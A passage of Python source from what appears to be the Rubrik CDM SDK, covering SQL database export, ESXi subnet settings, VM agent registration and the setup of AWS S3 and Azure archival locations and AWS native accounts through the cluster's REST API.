def sql_db_export(self, db_name, date, time, sql_instance=None, sql_host=None, target_instance_name=None, target_hostname=None, target_database_name=None, target_data_file_path=None, target_log_file_path=None, target_file_paths=None, finish_recovery=True, max_data_streams=2, allow_overwrite=False, timeout=15): # pylint: ignore
"""Export an SQL database from a specified recovery point to a target SQL Instance and Host. Requires database data and log file name directory paths.
Arguments:
db_name {str} -- The name of the database to be exported.
date {str} -- The recovery_point date formated as 'Month-Date-Year' (ex: 8-9-2018).
time {str} -- The recovery_point time formated as `Hour:Minute` (ex: 3:30 AM).
Keyword Arguments:
sql_instance {str} -- The SQL instance name with the database to be exported.
sql_host {str} -- The SQL Host of the database/instance to be exported.
target_instance_name {str} -- Name of the Microsoft SQL instance for the new database.
target_hostname {str} -- Name of the Microsoft SQL host for the new database.
target_database_name {str} -- Name of the new database.
target_data_file_path {str} -- The target path to store all data files.
target_log_file_path {str} -- The target path to store all log files.
target_file_paths {list} -- A list of dictionary objects each with key value pairs: {'logicalName': 'Logical name of the database file', 'exportPath': 'The target path for the database file', 'newLogicalName': 'New logical name for the database file', 'newFilename': 'New filename for the database file'}. One target path for each individual database file. Overrides targetDataFilePath and targetLogFilePath.
finish_recovery {str} -- A Boolean value that determines the recovery option to use during database restore. When this value is 'true', the database is restored using the RECOVERY option and is fully functional at the end of the restore operation. When this value is 'false', the database is restored using the NORECOVERY option and remains in recovering mode at the end of the restore operation.
max_data_streams {str} -- Maximum number of parallel data streams that can be used to copy data to the target system.
allow_overwrite {str} -- A Boolean value that determines whether an existing database can be overwritten by a database this is exported from a backup. Set to false to prevent overwrites. This is the default. Set to true to allow overwrites.
timeout {int} -- The number of seconds to wait to establish a connection with the Rubrik cluster before returning a timeout error. (default: {30})
Returns:
dict -- The full response of `POST /v1/mssql/db/{id}/export`.
"""
self.function_name = inspect.currentframe().f_code.co_name
if target_file_paths is None:
if target_data_file_path is None or target_log_file_path is None:
raise InvalidParameterException(
"The 'target_data_file_path' and 'target_log_file_path' parameters must be provided if a 'target_file_paths' dictionary list is not provided.")
mssql_id = self._validate_sql_db(db_name, sql_instance, sql_host)
recovery_point = self._validate_sql_recovery_point(
mssql_id, date, time)
target_host_id = self.object_id(
target_hostname, 'physical_host', timeout=timeout)
self.log("sql_db_export: Getting the instances on target host {}.".format(
target_hostname))
mssql_instance = self.get(
'v1', '/mssql/instance?primary_cluster_id=local&root_id={}'.format(target_host_id), timeout=timeout)
for instance in mssql_instance['data']:
if instance['name'] == target_instance_name:
target_instance_id = instance['id']
break
else:
raise InvalidParameterException(
"The target SQL instance {} does not exist, please provide a valid target instance".format(target_instance_name))
try:
if recovery_point['is_recovery_point'] == False:
raise InvalidParameterException(
"The database '{}' does not have a recovery_point taken on {} at {}.".format(
db_name, date, time))
except NameError:
pass
else:
config = {}
config['recoveryPoint'] = {
'timestampMs': recovery_point['recovery_timestamp']}
config['targetInstanceId'] = target_instance_id
config['targetDatabaseName'] = target_database_name
if target_file_paths is not None:
config['targetFilePaths'] = target_file_paths
else:
config['targetDataFilePath'] = target_data_file_path
config['targetLogFilePath'] = target_log_file_path
config['finishRecovery'] = finish_recovery
config['maxDataStreams'] = max_data_streams
config['allowOverwrite'] = allow_overwrite
self.log(
"sql_db_export: Exporting the database '{}' from recovery_point on {} at {} with new name '{}'.".format(
db_name,
date,
time,
target_database_name))
return self.post('v1', '/mssql/db/{}/export'.format(mssql_id), config, timeout)
def set_esxi_subnets(self, esx_subnets=None, timeout=15): # pylint: ignore
"""Sets the subnets that should be used to reach the ESXi hosts.
Keyword Arguments:
esx_subnets {list} -- Preferred subnets used to reach the ESX hosts.
timeout {int} -- The number of seconds to wait to establish a connection with the Rubrik cluster before returning a timeout error. (default: {15})
Returns:
dict -- The full response of `PATCH /internal/vmware/config/set_esx_subnets`.
"""
self.log(
"set_esx_subnets: Getting the existing subnets used to reach the ESXi hosts")
subnets = (self.get_esxi_subnets())['esxSubnets'].split(',')
config = {}
if esx_subnets is None:
raise InvalidParameterException(
"The 'esx_subnets' parameter must be provided.")
elif isinstance(esx_subnets, list):
if subnets == esx_subnets:
return "No change required. The subnet list provided is the same as the existing values: {}.".format(
subnets)
else:
subnet_str = ','.join(esx_subnets)
config['esxSubnets'] = subnet_str
self.log(
"set_esx_subnets: Setting the subnets that should be used to reach the ESXi hosts: '{}'.".format(
esx_subnets))
return self.patch('internal', '/vmware/config/set_esx_subnets', config, timeout)
else:
raise InvalidParameterException(
"The provided 'esx_subnets' parameter is not a list.")
def get_esxi_subnets(self, timeout=15): # pylint: ignore
"""Retrieve the preferred subnets used to reach the ESXi hosts.
Keyword Arguments:
timeout {int} -- The number of seconds to wait to establish a connection with the Rubrik cluster before returning a timeout error. (default: {15})
Returns:
dict -- The full response of `GET /internal/vmware/config/esx_subnets`.
"""
self.log(
"get_esx_subnets: Retrieving the preferred subnets used to reach the ESXi hosts.")
return self.get('internal', '/vmware/config/esx_subnets', timeout)
def get_all_hosts(self, timeout=15):
"""Retrieve information for each host connected to the Rubrik cluster.
Arguments:
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {15})
Returns:
dict -- The result of the API call `GET /v1/host`
"""
self.log(
'get_all_hosts: Getting information for each host on the Rubrik cluster.')
return self.get('v1', '/host', timeout=timeout)
def register_vm(self, name, timeout=15):
"""Register the Rubrik Backup Service on a vSphere VM.
Arguments:
name {str} -- The name of the vSphere VM.
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {15})
Keyword Arguments:
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {30})
Returns:
str -- No change required. The VM `name` is already registered.
dict -- The result of the call for `POST /v1/vmware/vm/{id}/register_agent`.
"""
vm_id = self.object_id(name, 'vmware', timeout=timeout)
self.log('register_vm: Determining if the agent state of the VM. ]')
vm_details = self.get("v1", "/vmware/vm/{}".format(vm_id))
if vm_details["isAgentRegistered"] is True:
return "No change required. The VM {} is already registered.".format(name)
self.log('register_vm: Registering the RBS agent.')
return self.post('v1', '/vmware/vm/{}/register_agent'.format(vm_id), {}, timeout=timeout) | /rubrik_cdm-2.0.10.tar.gz/rubrik_cdm-2.0.10/rubrik_cdm/data_management.py | 0.627609 | 0.174094 | data_management.py | pypi |
import os
import re
from .api import Api
from .exceptions import InvalidParameterException, CDMVersionException, InvalidTypeException
import inspect
class Cloud(Api):
"""This class contains methods for the managment of Cloud related functionality on the Rubrik cluster."""
def aws_s3_cloudout(self, aws_bucket_name, archive_name='default', aws_region=None, aws_access_key=None, aws_secret_key=None, kms_master_key_id=None, rsa_key=None, storage_class='standard', timeout=180): # pylint: ignore
"""Add a new AWS S3 archival location to the Rubrik cluster.
Arguments:
aws_bucket_name {str} -- The name of the AWS S3 bucket you wish to use as an archive target. The bucket name will automatically have all whitespace removed, all letters lowercased, and can not contain any of the following characters: `_\/*?%.:\|<>`.
Keyword Arguments:
aws_region {str} -- The name of the AWS region where the bucket is located. If set to the default `None` keyword argument, we will look for a `AWS_DEFAULT_REGION` environment variable to pull the value from. (default: {None}) (choices: {ap-south-1, ap-northeast-2, ap-southeast-1, ap-southeast-2, ap-northeast-1, ca-central-1, cn-north-1, cn-northwest-1, eu-central-1, eu-west-1, eu-west-2, eu-west-3, sa-east-1, us-gov-west-1, us-west-1, us-east-1, us-east-2, us-west-2})
aws_access_key {str} -- The access key of a AWS account with the required permissions. If set to the default `None` keyword argument, we will look for a `AWS_ACCESS_KEY_ID` environment variable to pull the value from. (default: {None})
aws_secret_key {str} -- The secret key of a AWS account with the required permissions. If set to the default `None` keyword argument, we will look for a `AWS_SECRET_ACCESS_KEY` environment variable to pull the value from. (default: {None})
kms_master_key_id {str} -- The AWS KMS master key ID that will be used to encrypt the archive data. If set to the default `None` keyword argument, you will need to provide a `rsa_key` instead. (default: {None})
rsa_key {str} -- The RSA key that will be used to encrypt the archive data. A key can be generated through `openssl genrsa -out rubrik_encryption_key.pem 2048`. If set to the default `None` keyword argument, you will need to provide a `kms_master_key_id` instead. (default: {None})
archive_name {str} -- The name of the archive location used in the Rubrik GUI. If set to 'default' the following naming convention will be used: "AWS:S3:`aws_bucket_name`" (default: {'default'})
storage_class {str} -- The AWS storage class you wish to use. (default: {'standard'}) (choices: {standard, 'standard_ia, reduced_redundancy, onezone_ia})
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {180})
Returns:
str -- No change required. The '`name`' archival location is already configured on the Rubrik cluster.
dict -- The full API response for `POST /internal/archive/object_store`.
"""
self.function_name = inspect.currentframe().f_code.co_name
valid_aws_regions = [
'ap-south-1',
'ap-northeast-2',
'ap-southeast-1',
'ap-southeast-2',
'ap-northeast-1',
'ca-central-1',
'cn-north-1',
'cn-northwest-1',
'eu-central-1',
'eu-west-1',
'eu-west-2',
'eu-west-3',
'sa-east-1',
'us-gov-west-1',
'us-west-1',
'us-east-1',
'us-east-2',
'us-west-2']
valid_storage_classes = [
'standard',
'standard_ia',
'reduced_redundancy',
'onezone_ia']
if re.compile(r'[_\/*?%.:|<>]').findall(aws_bucket_name):
raise InvalidParameterException(
r"The `aws_bucket_name` may not contain any of the following characters: _\/*?%.:|<>")
if aws_region is None:
aws_region = os.environ.get('AWS_DEFAULT_REGION')
if aws_region is None:
raise InvalidParameterException("`aws_region` has not been provided.")
if aws_access_key is None:
aws_access_key = os.environ.get('AWS_ACCESS_KEY_ID')
if aws_access_key is None:
raise InvalidParameterException("`aws_access_key` has not been provided.")
if aws_secret_key is None:
aws_secret_key = os.environ.get('AWS_SECRET_ACCESS_KEY')
if aws_secret_key is None:
raise InvalidParameterException("`aws_secret_key` has not been provided.")
if aws_region not in valid_aws_regions:
raise InvalidParameterException('The `aws_region` must be one of the following: {}'.format(
valid_aws_regions))
if storage_class not in valid_storage_classes:
raise InvalidParameterException('The `storage_class` must be one of the following: {}'.format(
valid_storage_classes))
else:
storage_class = storage_class.upper()
if archive_name == 'default':
archive_name = 'AWS:S3:{}'.format(aws_bucket_name.lower().strip())
if kms_master_key_id is None and rsa_key is None:
raise InvalidParameterException(
"You must populated either `kms_master_key_id` or `rsa_key`.")
elif kms_master_key_id is not None and rsa_key is not None:
raise InvalidParameterException(
"Both `kms_master_key_id` or `rsa_key` have been populated. You may only use one.")
archives_on_cluster = self.get('internal', '/archive/object_store', timeout=timeout)
config = {}
config['name'] = archive_name
config['bucket'] = aws_bucket_name.lower().strip()
config['defaultRegion'] = aws_region
config['storageClass'] = storage_class
config['accessKey'] = aws_access_key
config['secretKey'] = aws_secret_key
if kms_master_key_id:
config['kmsMasterKeyId'] = kms_master_key_id
elif rsa_key:
config['pemFileContent'] = rsa_key
config['objectStoreType'] = 'S3'
# Create a new dictionary that includes only the values returned by
# archives_on_cluster
redacted_archive_definition = {}
redacted_archive_definition['objectStoreType'] = 'S3'
redacted_archive_definition['name'] = archive_name
redacted_archive_definition['accessKey'] = aws_access_key
redacted_archive_definition['bucket'] = aws_bucket_name.lower().strip()
redacted_archive_definition['defaultRegion'] = aws_region
redacted_archive_definition['storageClass'] = storage_class
for archive in archives_on_cluster['data']:
# If present, remove the Cloud On Configuration for comparison
archive_definition = archive['definition']
for value in ["encryptionType", "defaultComputeNetworkConfig",
"isComputeEnabled", "isConsolidationEnabled"]:
try:
del archive_definition[value]
except BaseException:
pass
if archive_definition == redacted_archive_definition:
return "No change required. The '{}' archival location is already configured on the Rubrik cluster.".format(
archive_name)
if archive['definition']['objectStoreType'] == 'S3' and archive['definition']['name'] == archive_name:
raise InvalidParameterException(
"Archival location with name '{}' already exists. Please enter a unique `archive_name`.".format(archive_name))
self.log("aws_s3_cloudout: Creating the AWS S3 archive location.")
return self.post('internal', '/archive/object_store', config, timeout)
def update_aws_s3_cloudout(self, current_archive_name, new_archive_name=None, aws_access_key=None, aws_secret_key=None, storage_class=None, timeout=180): # pylint: ignore
"""Update an AWS S3 archival location on the Rubrik cluster.
Keyword Arguments:
current_archive_name {str} -- The name of the current archive to be updated.
new_archive_name {str} -- Desired name for the updated archive location. If set to default `None` keyword argument, no change will be made. (default: {None})
aws_access_key {str} -- The access key of a AWS account with the required permissions. If set to the default `None` keyword argument, no change will be made. (default: {None})
aws_secret_key {str} -- The secret key of a AWS account with the required permissions. If set to the default `None` keyword argument, no change will be made. (default: {None})
storage_class {str} -- The AWS storage class you wish to use. If set to the default `None` keyword argument, no change will be made. (default: {None}) (choices: {standard, 'standard_ia, reduced_redundancy, onezone_ia})
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {180})
Returns:
dict -- The full API response for `PATCH /internal/archive/object_store/{id}'`.
"""
self.function_name = inspect.currentframe().f_code.co_name
valid_storage_classes = [
'standard',
'standard_ia',
'reduced_redundancy',
'onezone_ia']
if storage_class is not None and storage_class not in valid_storage_classes:
raise InvalidParameterException(
'The `storage_class` must be one of the following: {}'.format(valid_storage_classes))
update_config = None
self.log("update_aws_s3_cloudout: Searching the Rubrik cluster for S3 archival locations named {}.".format(
current_archive_name))
archives_on_cluster = self.get('internal', '/archive/object_store', timeout=timeout)
for archive in archives_on_cluster['data']:
# If present, remove the Cloud On Configuration for comparison
archive_definition = archive['definition']
try:
del archive_definition['defaultComputeNetworkConfig']
except BaseException:
pass
if archive['definition']['objectStoreType'] == 'S3' and archive['definition']['name'] == current_archive_name:
self.log("update_aws_s3_cloudout: Found matching S3 archival location named {}.".format(current_archive_name))
update_config = archive_definition
archive_id = archive['id']
if update_config is None:
raise InvalidParameterException(
"No S3 archival location with name '{}' exists.".format(current_archive_name))
if new_archive_name:
update_config['name'] = new_archive_name
if aws_access_key:
update_config['accessKey'] = aws_access_key
if aws_secret_key:
update_config['secretKey'] = aws_secret_key
if storage_class:
update_config['storageClass'] = storage_class.upper()
self.log("update_aws_s3_cloudout: Updating the AWS S3 archive location named {}.".format(current_archive_name))
return self.patch('internal', '/archive/object_store/{}'.format(archive_id), update_config, timeout)
def aws_s3_cloudon(self, archive_name, vpc_id, subnet_id, security_group_id, enable_archive_consolidation=False, timeout=30):
"""Enable CloudOn for an exsiting AWS S3 archival location.
Arguments:
archive_name {str} -- The name of the archive location used in the Rubrik GUI.
vpc_id {str} -- The AWS VPC ID used by Rubrik cluster to launch a temporary Rubrik instance in AWS for instantiation.
subnet_id {str} -- The AWS Subnet ID used by Rubrik cluster to launch a temporary Rubrik instance in AWS for instantiation.
security_group_id {str} -- The AWS Security Group ID used by Rubrik cluster to launch a temporary Rubrik instance in AWS for instantiation.
Keyword Arguments:
enable_archive_consolidation {bool} - Flag that determines whether archive consolidation is enabled. (default: {False})
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {30})
Returns:
str -- No change required. The '`name`' archival location is already configured on the Rubrik cluster.
dict -- The full API response for `PATCH /internal/archive/object_store/{id}`.
"""
self.function_name = inspect.currentframe().f_code.co_name
if not isinstance(enable_archive_consolidation, bool):
raise InvalidTypeException("The enable_archive_consolidation value must a boolean value (True or False).")
self.log("aws_s3_cloudon: Searching the Rubrik cluster for archival locations.")
archives_on_cluster = self.get('internal', '/archive/object_store', timeout=timeout)
config = {}
config['defaultComputeNetworkConfig'] = {}
config['defaultComputeNetworkConfig']['subnetId'] = subnet_id
config['defaultComputeNetworkConfig']['vNetId'] = vpc_id
config['defaultComputeNetworkConfig']['securityGroupId'] = security_group_id
config['isConsolidationEnabled'] = enable_archive_consolidation
for archive in archives_on_cluster['data']:
if archive['definition']['objectStoreType'] == 'S3' and archive['definition']['name'] == archive_name:
# If present, remove the Cloud On configuration for proper
# comparison
try:
if archive['definition']['defaultComputeNetworkConfig'] == config['defaultComputeNetworkConfig'] and archive['definition']['isConsolidationEnabled'] == config['isConsolidationEnabled']:
return "No change required. The '{}' archival location is already configured for CloudOn.".format(
archive_name)
if archive['definition']['defaultComputeNetworkConfig'] != config['defaultComputeNetworkConfig']:
self.log("aws_s3_cloudon: Updating the archive location Cloud Compute network settings.")
return self.patch('internal', "/archive/object_store/{}".format(archive['id']), config, timeout)
if archive['definition']['isConsolidationEnabled'] != config['isConsolidationEnabled']:
self.log("aws_s3_cloudon: Updating the archive location Cloud Compute consolidation settings.")
return self.patch('internal', "/archive/object_store/{}".format(archive['id']), config, timeout)
except KeyError:
self.log("aws_s3_cloudon: Updating the archive location for CloudOn.")
return self.patch('internal', "/archive/object_store/{}".format(archive['id']), config, timeout)
raise InvalidParameterException(
"The Rubrik cluster does not have an archive location named '{}'.".format(archive_name))
def azure_cloudout(self, container, azure_access_key, storage_account_name, rsa_key, archive_name='default', instance_type='default', timeout=180): # pylint: ignore
"""Add a new Azure archival location to the Rubrik cluster.
Arguments:
container {str} -- The name of the Azure storage container you wish to use as an archive. The container name will automatically be lowercased and can not contain any of the following characters: `_\/*?%.:\|<>`.
azure_access_key {str} -- The access key for the Azure storage account.
storage_account_name {str} -- The name of the Storage Account that the `container` belongs to.
rsa_key {str} -- The RSA key that will be used to encrypt the archive data. A key can be generated through `openssl genrsa -out rubrik_encryption_key.pem 2048`.
Keyword Arguments:
archive_name {str} -- The name of the archive location used in the Rubrik GUI. If set to `default`, the following naming convention will be used: "Azure:`container`" (default: {'default'})
instance_type {str} -- The Cloud Platform type of the archival location. (default: {'default'}) (choices: {'default', 'china', 'germany', 'government'})
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {180})
Returns:
str -- No change required. The '`name`' archival location is already configured on the Rubrik cluster.
dict -- The full API response for `POST /internal/archive/object_store`.
"""
self.function_name = inspect.currentframe().f_code.co_name
container = container.lower()
if re.compile(r'[_\/*?%.:|<>]').findall(container):
raise InvalidParameterException(
r"The `container` may not contain any of the following characters: _\/*?%.:|<>")
valid_instance_types = ['default', 'china', 'germany', 'government']
if instance_type not in valid_instance_types:
raise InvalidParameterException('The `instance_type` argument must be one of the following: {}'.format(
valid_instance_types))
if archive_name == 'default':
archive_name = 'Azure:{}'.format(container)
self.log("azure_cloudout: Searching the Rubrik cluster for archival locations.")
archives_on_cluster = self.get('internal', '/archive/object_store', timeout=timeout)
config = {}
config['name'] = archive_name
config['bucket'] = container
config['accessKey'] = storage_account_name
config['secretKey'] = azure_access_key
config['pemFileContent'] = rsa_key
config['objectStoreType'] = 'Azure'
if instance_type == 'government':
config['endpoint'] = 'core.usgovcloudapi.net'
elif instance_type == 'germany':
config['endpoint'] = 'core.cloudapi.de'
elif instance_type == 'china':
config['endpoint'] = 'core.chinacloudapi.cn'
# Create a new dictionary that includes only the values returned by
# archives_on_cluster
redacted_archive_definition = {}
redacted_archive_definition['objectStoreType'] = 'Azure'
redacted_archive_definition['name'] = archive_name
redacted_archive_definition['accessKey'] = storage_account_name
redacted_archive_definition['bucket'] = container
if instance_type == 'government':
redacted_archive_definition['endpoint'] = 'core.usgovcloudapi.net'
elif instance_type == 'germany':
redacted_archive_definition['endpoint'] = 'core.cloudapi.de'
elif instance_type == 'china':
redacted_archive_definition['endpoint'] = 'core.chinacloudapi.cn'
for archive in archives_on_cluster['data']:
# If present, remove the Cloud On Configuration for comparison
archive_definition = archive['definition']
for value in ["encryptionType", "defaultComputeNetworkConfig",
"isComputeEnabled", "isConsolidationEnabled", "azureComputeSummary"]:
try:
del archive_definition[value]
except BaseException:
pass
if archive_definition == redacted_archive_definition:
return "No change required. The '{}' archival location is already configured on the Rubrik cluster.".format(
archive_name)
if archive_definition['objectStoreType'] == 'Azure' and archive_definition['name'] == archive_name:
raise InvalidParameterException("Archival location with name '{}' already exists. Please enter a unique `name`.".format(
archive_name))
self.log("azure_cloudout: Creating the Azure archive location.")
return self.post('internal', '/archive/object_store', config)
def azure_cloudon(self, archive_name, container, storage_account_name, application_id, application_key, tenant_id, region, virtual_network_id, subnet_name, security_group_id, timeout=30): # pylint: ignore
"""Enable CloudOn for an existing Azure archival location.
Arguments:
archive_name {str} -- The name of the archive location used in the Rubrik GUI.
container {str} -- The name of the Azure storage container being used as the archive target. The container name will automatically be lowercased and can not contain any of the following characters: `_\/*?%.:\|<>`.
storage_account_name {str} -- The name of the Storage Account that the `container` belongs to.
application_id {str} -- The ID of the application registered in Azure Active Directory.
application_key {str} -- The key of the application registered in Azure Active Directory.
tenant_id {str} -- The tenant ID, also known as the directory ID, found under the Azure Active Directory properties.
region {str} -- The name of the Azure region where the `container` is located. (choices: {westus, westus2, centralus, eastus, eastus2, northcentralus, southcentralus, westcentralus, canadacentral, canadaeast, brazilsouth, northeurope, westeurope, uksouth, ukwest, eastasia, southeastasia, japaneast, japanwest, australiaeast australiasoutheast, centralindia, southindia, westindia, koreacentral, koreasouth})
virtual_network_id {str} -- The Azure virtual network ID used by Rubrik cluster to launch a temporary Rubrik instance in Azure for instantiation.
subnet_name {str} -- The Azure subnet name used by Rubrik cluster to launch a temporary Rubrik instance in Azure for instantiation.
security_group_id {str} -- The Azure Security Group ID used by Rubrik cluster to launch a temporary Rubrik instance in Azure for instantiation.
Keyword Arguments:
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {30})
Returns:
str -- No change required. The '`archive_name`' archival location is already configured for CloudOn.
dict -- The full API response for `PATCH /internal/archive/object_store/{id}`.
"""
self.function_name = inspect.currentframe().f_code.co_name
valid_regions = [
"westus",
"westus2",
"centralus",
"eastus",
"eastus2",
"northcentralus",
"southcentralus",
"westcentralus",
"canadacentral",
"canadaeast",
"brazilsouth",
"northeurope",
"westeurope",
"uksouth",
"ukwest",
"eastasia",
"southeastasia",
"japaneast",
"japanwest",
"australiaeast",
"australiasoutheast",
"centralindia",
"southindia",
"westindia",
"koreacentral",
"koreasouth"]
if region not in valid_regions:
raise InvalidParameterException('The `region` must be one of the following: {}'.format(valid_regions))
self.log("azure_cloudon: Searching the Rubrik cluster for archival locations.")
archives_on_cluster = self.get('internal', '/archive/object_store', timeout=timeout)
config = {}
config['name'] = archive_name
config['objectStoreType'] = 'Azure'
config['isComputeEnabled'] = True
config['azureComputeSummary'] = {}
config['azureComputeSummary']["tenantId"] = tenant_id
config['azureComputeSummary']["subscriptionId"] = virtual_network_id.split("/")[2]
config['azureComputeSummary']["clientId"] = application_id
config['azureComputeSummary']["region"] = region
config['azureComputeSummary']["generalPurposeStorageAccountName"] = storage_account_name
config['azureComputeSummary']["containerName"] = container
config['azureComputeSecret'] = {}
config['azureComputeSecret']["clientSecret"] = application_key
config['defaultComputeNetworkConfig'] = {}
config['defaultComputeNetworkConfig']['subnetId'] = subnet_name
config['defaultComputeNetworkConfig']['vNetId'] = virtual_network_id
config['defaultComputeNetworkConfig']['securityGroupId'] = security_group_id
redacted_archive_definition = {}
redacted_archive_definition['name'] = archive_name
redacted_archive_definition['objectStoreType'] = "Azure"
redacted_archive_definition['accessKey'] = storage_account_name
redacted_archive_definition['bucket'] = container
redacted_archive_definition['isComputeEnabled'] = True
redacted_archive_definition['azureComputeSummary'] = {}
redacted_archive_definition['azureComputeSummary']["tenantId"] = tenant_id
redacted_archive_definition['azureComputeSummary']["subscriptionId"] = virtual_network_id.split("/")[2]
redacted_archive_definition['azureComputeSummary']["clientId"] = application_id
redacted_archive_definition['azureComputeSummary']["region"] = region
redacted_archive_definition['azureComputeSummary']["generalPurposeStorageAccountName"] = storage_account_name
redacted_archive_definition['azureComputeSummary']["containerName"] = container
redacted_archive_definition['defaultComputeNetworkConfig'] = {}
redacted_archive_definition['defaultComputeNetworkConfig']['subnetId'] = subnet_name
redacted_archive_definition['defaultComputeNetworkConfig']['vNetId'] = virtual_network_id
redacted_archive_definition['defaultComputeNetworkConfig']['securityGroupId'] = security_group_id
for archive in archives_on_cluster['data']:
archive_definition = archive['definition']
for value in ["isConsolidationEnabled", "encryptionType"]:
try:
del archive_definition[value]
except BaseException:
pass
try:
del archive_definition["azureComputeSummary"]["environment"]
except BaseException:
pass
try:
del archive_definition["defaultComputeNetworkConfig"]["resourceGroupId"]
except BaseException:
pass
if archive['definition']['objectStoreType'] == 'Azure' and archive['definition']['name'] == archive_name:
if archive['definition'] == redacted_archive_definition:
return "No change required. The '{}' archival location is already configured for CloudOn.".format(
archive_name)
else:
self.log("azure_cloudon: Updating the archive location for CloudOn.")
return self.patch('internal', "/archive/object_store/{}".format(archive['id']), config, timeout)
raise InvalidParameterException(
"The Rubrik cluster does not have an archive location named '{}'.".format(archive_name))
def add_aws_native_account(self, aws_account_name, aws_access_key=None, aws_secret_key=None, aws_regions=None, regional_bolt_network_configs=None, timeout=30): # pylint: ignore
"""Add a new AWS account to EC2 native protection on the Rubrik cluster.
Arguments:
aws_account_name {str} -- The name of the AWS account you wish to protect. This is the name that will be displayed in the Rubrik UI.
Keyword Arguments:
aws_access_key {str} -- The access key of a AWS account with the required permissions. If set to the default `None` keyword argument, we will look for a `AWS_ACCESS_KEY_ID` environment variable to pull the value from. (default: {None})
aws_secret_key {str} -- The secret key of a AWS account with the required permissions. If set to the default `None` keyword argument, we will look for a `AWS_SECRET_ACCESS_KEY` environment variable to pull the value from. (default: {None})
aws_regions {list} -- List of AWS regions to protect in this AWS account. If set to the default `None` keyword argument, we will look for a `AWS_DEFAULT_REGION` environment variable to pull the value from. (default: {None}) (choices: {ap-south-1, ap-northeast-3, ap-northeast-2, ap-southeast-1, ap-southeast-2, ap-northeast-1, ca-central-1, cn-north-1, cn-northwest-1, eu-central-1, eu-west-1, eu-west-2, eu-west-3, us-west-1, us-east-1, us-east-2, us-west-2})
regional_bolt_network_configs {list of dicts} -- List of dicts containing per region bolt network configs. (ex. dict format: {"region": "aws-region-name", "vNetId": "aws-vpc-id", "subnetId": "aws-subnet-id", "securityGroupId": "aws-subnet-id"}) (default: {None})
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {30})
Returns:
str -- No change required. Cloud native source with access key `aws_access_key` is already configured on the Rubrik cluster.
dict -- The full API response for `POST /internal/aws/account'`.
"""
self.function_name = inspect.currentframe().f_code.co_name
valid_aws_regions = [
'ap-south-1',
'ap-northeast-3',
'ap-northeast-2',
'ap-southeast-1',
'ap-southeast-2',
'ap-northeast-1',
'ca-central-1',
'cn-north-1',
'cn-northwest-1',
'eu-central-1',
'eu-west-1',
'eu-west-2',
'eu-west-3',
'us-west-1',
'us-east-1',
'us-east-2',
'us-west-2']
# verify we are on cdm 4.2 or newer, required for cloud native
# protection
if self.minimum_installed_cdm_version(4.2) is False:
raise CDMVersionException(4.2)
# check for regions and credentials in environment variables if not
# provided explicitly
if aws_regions is None:
aws_regions = [os.environ.get('AWS_DEFAULT_REGION')]
if aws_regions == [None]:
raise InvalidParameterException("`aws_region` has not been provided.")
if aws_access_key is None:
aws_access_key = os.environ.get('AWS_ACCESS_KEY_ID')
if aws_access_key is None:
raise InvalidParameterException("`aws_access_key` has not been provided.")
if aws_secret_key is None:
aws_secret_key = os.environ.get('AWS_SECRET_ACCESS_KEY')
if aws_secret_key is None:
raise InvalidParameterException("`aws_secret_key` has not been provided.")
# verify supplied regions are in the supported list of regions for
# cloud native protection
if any(aws_region not in valid_aws_regions for aws_region in aws_regions):
raise InvalidParameterException(
'The list `aws_regions` may only contain the following values: {}'.format(valid_aws_regions))
# verify that our regional_bolt_network_configs are either None or in a
# list
if isinstance(regional_bolt_network_configs, list) is False and regional_bolt_network_configs is not None:
raise InvalidTypeException("`regional_bolt_network_configs` must be a list if defined.")
if regional_bolt_network_configs is not None:
# verify our list of bolt_network_configs only contains dicts
for bolt_network_config in regional_bolt_network_configs:
if isinstance(bolt_network_config, dict) is False:
raise InvalidTypeException("The `regional_bolt_network_configs` list can only contain dicts.")
# verify that all the required paramteters are provided in all
# regional_bolt_network_configs
if any(requiredkey not in bolt_network_config for requiredkey in [
'region',
'vNetId',
'subnetId',
'securityGroupId']):
raise InvalidParameterException(
"Each `regional_bolt_network_config` dict must contain the following keys: 'region', 'vNetId', 'subnetId', 'securityGroupId'.")
self.log("aws_native_account: Searching the Rubrik cluster for cloud native sources.")
cloud_native_on_cluster = self.get('internal', '/aws/account', timeout=timeout)
for cloud_source in cloud_native_on_cluster['data']:
# verify a cloud native source with this name does not exist
# already
self.log("aws_native_account: Validating no conflict with `{}`".format(cloud_source['id']))
if cloud_source['name'] == aws_account_name:
raise InvalidParameterException("Cloud native source with name '{}' already exists. Please enter a unique `aws_account_name`.".format(
aws_account_name))
# idempotent return if a cloud native source with this access key
# already exists
cloud_source_detail = self.get('internal', '/aws/account/{}'.format(cloud_source['id']), timeout=timeout)
if cloud_source_detail['accessKey'] == aws_access_key:
return "No change required. Cloud native source with access key '{}' is already configured on the Rubrik cluster.".format(
aws_access_key)
# build the config for our API call
config = {}
config['name'] = aws_account_name
config['accessKey'] = aws_access_key
config['secretKey'] = aws_secret_key
config['regions'] = aws_regions
# only include bolt configs if they were supplied
if regional_bolt_network_configs is not None:
config['regionalBoltNetworkConfigs'] = regional_bolt_network_configs
# make the API call, return the result
self.log("aws_native_account: Creating the cloud native source.")
return self.post('internal', '/aws/account', config, timeout)
def update_aws_native_account(self, aws_account_name, config, timeout=15):
"""Update an exsiting AWS account used for EC2 native protection on the Rubrik cluster.
Arguments:
aws_account_name {str} -- The name of the AWS account you wish to update. This is the name that is displayed in the Rubrik UI.
Keyword Arguments:
config {dict} -- The configuration to use to update the AWS account. Full example values can be found in the Rubrik API Playground for the PATCH /aws/account/{id} endpoint
timeout {int} -- The number of seconds to wait to establish a connection the Rubrik cluster before returning a timeout error. (default: {15})
Returns:
dict -- The full API response for `PATCH /aws/account/{id}`.
"""
self.function_name = inspect.currentframe().f_code.co_name
# verify we are on cdm 4.2 or newer, required for cloud native
# protection
if self.minimum_installed_cdm_version(4.2) is False:
raise CDMVersionException(4.2)
if not isinstance(config, dict):
